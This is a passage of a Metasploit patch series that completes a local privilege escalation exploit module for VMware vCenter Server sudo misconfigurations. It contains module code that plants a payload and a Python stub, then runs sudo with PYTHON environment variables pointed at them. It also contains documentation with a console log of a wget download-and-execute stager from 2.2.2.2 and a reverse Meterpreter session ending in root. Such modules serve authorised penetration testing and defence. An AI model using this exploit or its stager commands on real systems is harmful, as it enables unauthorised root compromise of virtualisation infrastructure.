"#{base_dir}/__init__.py" + + # Upload payload executable + payload_path = "#{base_dir}/appliance/#{rand_text_alphanumeric(6..10)}" upload_and_chmodx payload_path, generate_payload_exe register_files_for_cleanup(payload_path) + + # Upload payload stub + payload_stub = "#{base_dir}/appliance/__init__.py" + write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()") + register_files_for_cleanup(payload_stub) + timeout = 30 print_status 'Launching exploit...' - output = cmd_exec "echo 'VMWARE_PYTHON_BIN=#{payload_path} sudo /bin/dcli & exit' | #{executable_path}", nil, timeout + output = cmd_exec "sudo VMWARE_PYTHON_BIN=#{payload_path} /bin/dcli", nil, timeout output.each_line { |line| vprint_status line.chomp } end @@ -145,9 +162,9 @@ def exploit @groups = cmd_exec('groups').chomp.split(' ') if @groups.nil? if @user == 'pod' exploit_pod_user - elsif @group.contains? 'operator' + elsif @groups.include? 'operator' exploit_operator_group - elsif @group.contains? 'admin' + elsif @groups.include? 'admin' exploit_admin_group end end From 0f6da56a5298974006604e8ee47338d0233ca92b Mon Sep 17 00:00:00 2001 From: h00die Date: Thu, 21 Nov 2024 04:34:15 -0500 Subject: [PATCH 6/7] vcenter sudo module --- .../exploit/linux/local/vcenter_sudo_lpe.md | 80 ++++++++++++++----- lib/msf/core/post/vcenter/vcenter.rb | 2 + .../exploits/linux/local/vcenter_sudo_lpe.rb | 17 ++-- 3 files changed, 69 insertions(+), 30 deletions(-) diff --git a/documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md b/documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md index f2b660ab7023..9bf5cb480710 100644 --- a/documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md +++ b/documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md @@ -1,27 +1,27 @@ ## Vulnerable Application -Instructions to get the vulnerable application. If applicable, include links to the vulnerable install -files, as well as instructions on installing/configuring the environment if it is different than a -standard install. Much of this will come from the PR, and can be copy/pasted. +VMware vCenter Server < 7.0.3 update R and < 8.0.2 update D +contains multiple local privilege escalation vulnerabilities +due to misconfiguration of sudo. An authenticated local user +with non-administrative privileges may exploit these issues +to elevate privileges to root on vCenter Server Appliance. + +Tested against VMware vCenter Server Appliance 8.0.0.10000 20519528 ## Verification Steps -Example steps in this format (is also in the PR): 1. Install the application -1. Start msfconsole -1. Do: `use [module path]` -1. Do: `run` -1. You should get a shell. +2. Start msfconsole +3. Get an initial user level shell +4. Do: `use exploit/linux/local/vcenter_sudo_lpe` +5. Do: `set lhost ` +6. Do: `set sessoin ` +7. Do: `run` +8. You should get a root shell. ## Options -List each option and how to use it. - -### Option Name - -Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here. ## Scenarios -Specific demo of using the module that might be useful in a real world scenario. ### VMware vCenter Server Appliance 8.0.0.10000 (VMware-VCSA-all-8.0.0-20519528.iso) @@ -85,7 +85,7 @@ pod@localhost [ /tmp ]$ wget -qO smswhnVK --no-check-certificate http://2.2.2.2: [1] 22325 ``` -Priv Esc +Priv Esc. Autocheck disabled due to an incomplete install. ``` [msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1 @@ -182,7 +182,7 @@ wget -qO JSlY5cPV --no-check-certificate http://2.2.2.2:8181/eEgibKL2K; chmod +x [*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:56166) at 2024-11-18 16:27:17 -0500 ``` -Priv Esc +Priv Esc. Autocheck disabled due to an incomplete install. ``` [msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > use exploit/linux/local/vcenter_sudo_lpe @@ -230,9 +230,9 @@ If the user `admin` exists, use that. If not, follow the bellow instructions Make a user in the operator group: ``` -sudo useradd -m -s /bin/bash admin -sudo usermod -aG admin admin -sudo usermod -aG users admin +useradd -m -s /bin/bash admin +usermod -aG admin admin +usermod -aG users admin ``` Start our first handler @@ -263,7 +263,45 @@ wget -qO IsMq60f5 --no-check-certificate http://2.2.2.2:8181/Hul7qG; chmod +x Is Priv Esc ``` -``` +[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/local/vcenter_sudo_lpe +[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp +[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set lhost 2.2.2.2 +lhost => 2.2.2.2 +[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set lport 9870 +lport => 9870 +[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set verbose true +verbose => true +[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set autocheck false +autocheck => false +[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set session 1 +session => 1 +[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > run +[*] Started reverse TCP handler on 2.2.2.2:9870 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] Exploitable version detected: 8.0.0.20519528 +[+] User is vulnerable +[+] The target appears to be vulnerable. Version 8.0.0.20519528 and user (admin:["users", "admin"]) are vulnerable +[*] Utilizing VMWARE_PYTHON_BIN exploitation method for admin group. +[*] Creating directory /tmp/appliance +[*] /tmp/appliance created +[*] Writing '/tmp/appliance/NKdii1ux' (250 bytes) ... +[*] Launching exploit... +[*] Transmitting intermediate stager...(126 bytes) +[*] Sending stage (3045380 bytes) to 1.1.1.1 +[+] Deleted /tmp/appliance/NKdii1ux +[+] Deleted /tmp/appliance/__init__.py +[+] Deleted /tmp/appliance +[*] Meterpreter session 2 opened (2.2.2.2:9870 -> 1.1.1.1:58686) at 2024-11-21 04:00:08 -0500 -XXX to be completed \ No newline at end of file +(Meterpreter 2)(/tmp) > getuid +Server username: root +(Meterpreter 2)(/tmp) > background +[*] Backgrounding session 2... +s[msf](Jobs:1 Agents:2) exploit(linux/local/vcenter_sudo_lpe) > sessions -i 1 +[*] Starting interaction with 1... + +(Meterpreter 1)(/tmp) > getuid +Server username: admin +(Meterpreter 1)(/tmp) > +``` diff --git a/lib/msf/core/post/vcenter/vcenter.rb b/lib/msf/core/post/vcenter/vcenter.rb index 02c455cb5edc..c884ec4d357b 100644 --- a/lib/msf/core/post/vcenter/vcenter.rb +++ b/lib/msf/core/post/vcenter/vcenter.rb @@ -118,6 +118,7 @@ def validate_pkey(private_key) # # It returns the vcenter product banner and build number + # Cross reference https://knowledge.broadcom.com/external/article/326316/build-numbers-and-versions-of-vmware-vce.html # @return [String] of vcenter product banner and build number # def get_vcenter_build @@ -125,6 +126,7 @@ def get_vcenter_build return cmd_exec("#{vpxd_bin} -v").split("\n").last.strip end + # this file may not be getting updated any longer. On vCenter 8.0.0.10000 it reads 6.5.0.0 Build 16197320 if file_exist?(manifest_file) xml = read_file(manifest_file) xmldoc = Nokogiri::XML(xml) do |config| diff --git a/modules/exploits/linux/local/vcenter_sudo_lpe.rb b/modules/exploits/linux/local/vcenter_sudo_lpe.rb index 256557673962..329b1db14ac8 100644 --- a/modules/exploits/linux/local/vcenter_sudo_lpe.rb +++ b/modules/exploits/linux/local/vcenter_sudo_lpe.rb @@ -24,6 +24,8 @@ def initialize(info = {}) due to misconfiguration of sudo. An authenticated local user with non-administrative privileges may exploit these issues to elevate privileges to root on vCenter Server Appliance. + + Tested against VMware vCenter Server Appliance 8.0.0.10000 20519528 }, 'License' => MSF_LICENSE, 'Author' => [ @@ -44,21 +46,18 @@ def initialize(info = {}) ], 'DisclosureDate' => '2024-06-18', 'DefaultTarget' => 0, - # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html 'Notes' => { - 'Stability' => [], - 'Reliability' => [], - 'SideEffects' => [] + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [ARTIFACTS_ON_DISK] } ) ) - # force exploit is used to bypass the check command results register_advanced_options [ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) ] end - # Simplify pulling the writable directory variable def base_dir datastore['WritableDir'].to_s end @@ -80,13 +79,13 @@ def check @user = cmd_exec('whoami').chomp @groups = cmd_exec('groups').chomp.split(' ') - if ['infraprofile', 'vpxd', 'sts', 'pod'].contains?(user) || (['operator', 'admin'] & group).any? + if ['infraprofile', 'vpxd', 'sts', 'pod'].include?(@user) || (['operator', 'admin'] & @groups).any? vprint_good('User is vulnerable') else - return CheckCode::Safe("User not vulnerable or not in correct group. (#{user}:#{groups})") + return CheckCode::Safe("User not vulnerable or not in correct group. (#{@user}:#{@groups})") end - CheckCode::Appears('System seems exploitable') + CheckCode::Appears("Version #{vbuild_version} and user (#{@user}:#{@groups}) are vulnerable") end def exploit_operator_group From bca3626cf2585acb857b769f2070d76df9bf7c31 Mon Sep 17 00:00:00 2001 From: h00die Date: Wed, 4 Dec 2024 18:39:43 -0500 Subject: [PATCH 7/7] peer review --- .../exploits/linux/local/vcenter_sudo_lpe.rb | 23 ++++++++++++------- 1 file changed, 15 insertions(+), 8 deletions(-) diff --git a/modules/exploits/linux/local/vcenter_sudo_lpe.rb b/modules/exploits/linux/local/vcenter_sudo_lpe.rb index 329b1db14ac8..88dc67f2bd28 100644 --- a/modules/exploits/linux/local/vcenter_sudo_lpe.rb +++ b/modules/exploits/linux/local/vcenter_sudo_lpe.rb @@ -54,7 +54,8 @@ def initialize(info = {}) ) ) register_advanced_options [ - OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), + OptInt.new('TIMEOUT', [ true, 'Command timeout', 30 ]) ] end @@ -68,7 +69,7 @@ def check # VMware vCenter Server Appliance 6.5.0.0 Build 16197320 # we want to try to make this build number Rex::Version friendly. https://rubular.com/r/BNLDjy0C862cdS # technically we only care about major release 7 and 8, however we'll try to future proof w/ \d instead - return CheckCode::Safe("Unable to determine vcenter build from output: #{vbuild}") unless /(\d\.\d\.\d) build[- ](\d+)/i =~ vbuild + return CheckCode::Safe("Unable to determine vcenter build from output: #{vbuild}") unless /(\d+\.\d+\.\d+) build[- ](\d+)/i =~ vbuild vbuild_version = Rex::Version.new("#{Regexp.last_match(1)}.#{Regexp.last_match(2)}") @@ -106,9 +107,8 @@ def exploit_operator_group write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()") register_files_for_cleanup(payload_stub) - timeout = 30 print_status 'Launching exploit...' - output = cmd_exec "sudo PYTHONPATH=#{base_dir} #{vuln_exe}", nil, timeout + output = cmd_exec "sudo PYTHONPATH=#{base_dir} #{vuln_exe}", nil, datastore['TIMEOUT'] output.each_line { |line| vprint_status line.chomp } end @@ -128,9 +128,8 @@ def exploit_pod_user write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()") register_files_for_cleanup(payload_stub) - timeout = 30 print_status 'Launching exploit...' - output = cmd_exec "sudo VMWARE_PYTHON_PATH=#{base_dir} install-parameter", nil, timeout + output = cmd_exec "sudo VMWARE_PYTHON_PATH=#{base_dir} install-parameter", nil, datastore['TIMEOUT'] output.each_line { |line| vprint_status line.chomp } end @@ -150,13 +149,19 @@ def exploit_admin_group write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()") register_files_for_cleanup(payload_stub) - timeout = 30 print_status 'Launching exploit...' - output = cmd_exec "sudo VMWARE_PYTHON_BIN=#{payload_path} /bin/dcli", nil, timeout + output = cmd_exec "sudo VMWARE_PYTHON_BIN=#{payload_path} /bin/dcli", nil, datastore['TIMEOUT'] output.each_line { |line| vprint_status line.chomp } end def exploit + if !datastore['ForceExploit'] && is_root? + fail_with(Failure::None, 'Session already has root privileges. Set ForceExploit to override') + end + unless writable?(base_dir) + fail_with(Failure::BadConfig, "#{base_dir} is not writable") + end + @user = cmd_exec('whoami').chomp if @user.nil? @groups = cmd_exec('groups').chomp.split(' ') if @groups.nil? if @user == 'pod' @@ -165,6 +170,8 @@ def exploit exploit_operator_group elsif @groups.include? 'admin' exploit_admin_group + else + fail_with(Failure::BadConfig, "User not vulnerable or not in correct group. (#{@user}:#{@groups})") end end end